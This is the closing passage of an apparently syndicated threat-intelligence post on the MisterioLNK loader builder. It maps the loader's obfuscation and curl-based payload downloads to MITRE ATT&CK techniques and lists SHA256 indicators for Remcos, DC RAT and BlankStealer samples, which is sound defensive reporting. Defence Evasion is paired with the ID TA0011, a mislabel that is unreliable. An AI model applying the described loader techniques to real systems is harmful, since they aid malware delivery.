Obfuscated Files or Information: Command Obfuscation (T1027.010)
MisterioLNK employs obfuscation techniques to hide the content of its scripts, making detection by security tools more difficult.

Defence Evasion (TA0011)
Application Layer Protocol: Web Protocols (T1071.001)
Uses HTTP/S through the curl command to communicate with remote servers to download payloads.

Indicators Of Compromise

Indicator
Indicator Type
Description

3bcde12b9388e30df1dee8925999e6101718fde3040d2708adbbc93b400e4a17
SHA256
Remcos

dba195e6ccc386f9d260f09e2c5d84c1a5f8b28c707e1a353f72dba9ffa2b850
SHA256
Remcos

1be9fcca5fd587accd9dbfa1b6a67a2e6bb58465dd78f775c40f6eb6480bfb5f
SHA256
Remcos

64fd11a9befea1310503336a6a8194fca7ab7af291562787c4985d1a1f06b4e1
SHA256
Remcos

0d32a67ee4193520116d2435d1d579811c5ab71c7550d433948eb82e027cc601
SHA256
DC RAT

7f8737e14ca51c1724c0f65a568cefa4d9e1536416ddf89569eab2cce8ae2e01
SHA256
BlankStealer

The post MisterioLNK: The Open-Source LNK Loader Builder Behind Malicious Loaders appeared first on Cyble.

Blog – Cyble – Read More